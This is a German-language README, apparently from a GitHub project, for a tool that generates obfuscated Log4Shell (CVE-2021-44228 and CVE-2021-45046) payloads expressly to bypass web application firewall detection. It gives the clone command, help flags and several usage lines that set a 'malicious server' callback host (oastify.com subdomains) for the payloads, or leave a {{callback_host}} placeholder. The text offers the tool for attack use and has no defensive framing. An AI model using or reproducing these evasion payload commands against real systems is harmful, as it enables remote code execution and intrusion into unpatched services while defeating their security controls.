
Erstelle primär verschleierte oder sekundär verschleierte CVE-2021-44228 oder CVE-2021-45046 Payloads, um WAF-Erkennung zu umgehen.
Log4Shell-obfuscated-payloads-generator kann primäre obfuskierten oder sekundäre obfuskierten CVE-2021-44228- oder CVE-2021-45046-Payloads generieren, um die WAF-Erkennung zu umgehen.
Die Designidee von Log4Shell-obfuscated-payloads-generator
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator funktioniert sofort mit Python Version 3.x auf jeder Plattform.
Um eine Liste der grundlegenden Optionen zu erhalten, verwenden Sie:
python3 Log4Shell-obfuscated-payloads-generator.py -h
Um Anwendungsbeispiele zu erhalten, verwenden Sie:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: eine Liste der grundlegenden Optionen erhalten

-hh: Anwendungsbeispiele erhalten

Mit einer einzelnen Option zur Generierung von Payloads gibt die -s Option den bösartigen Server an:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

Mit mehreren Optionen zur Generierung von Payloads gibt die -s Option einen bösartigen Server an:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

Ohne Angabe eines bösartigen Servers mit der -s Option bleibt der Platzhalter {{callback_host}} in den generierten Payloads erhalten:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
